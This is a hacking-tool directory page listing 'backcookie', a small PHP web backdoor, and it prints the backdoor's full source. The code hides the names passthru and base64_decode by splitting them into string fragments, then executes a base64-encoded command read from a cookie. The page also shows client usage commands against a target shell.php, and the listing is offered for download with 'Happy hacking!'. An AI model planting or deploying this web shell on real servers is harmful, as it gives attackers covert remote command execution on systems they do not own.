Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
backcookie — Small backdoor using cookie. | Kitploit
Tools/GitHubGitHub/jofpin/backcookie
Payload GenerationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access Trojan
GitHubjofpin/backcookie

backcookie

Small backdoor using cookie.

View Repository
643659 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

backcookie

Small backdoor using cookie.

==========

root@kitploit:~
<?php
# the code of the backdoor used
$bOne = "pa"."ss"."th"."ru";
$bTwo = "ba"."se"."64"."_"."de"."co"."de";
$bKey = "yourcookie"; # conection backdoor
$bOne($bTwo($_COOKIE[$bKey]));
?>
root@kitploit:~
Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
root@kitploit:~
Example two: python backcookie.py --url http://target.com/shell.php --cookie name_cookie

Custom command (binfo), You get objective information

root@kitploit:~
@pwned:~$ binfo

Custom command (exit), to exit.

root@kitploit:~
@pwned:~$ exit
  • Inserted in -> blackarch

Happy hacking!


Copyright, 2013 - 2016 by Jose Pino


Download Tool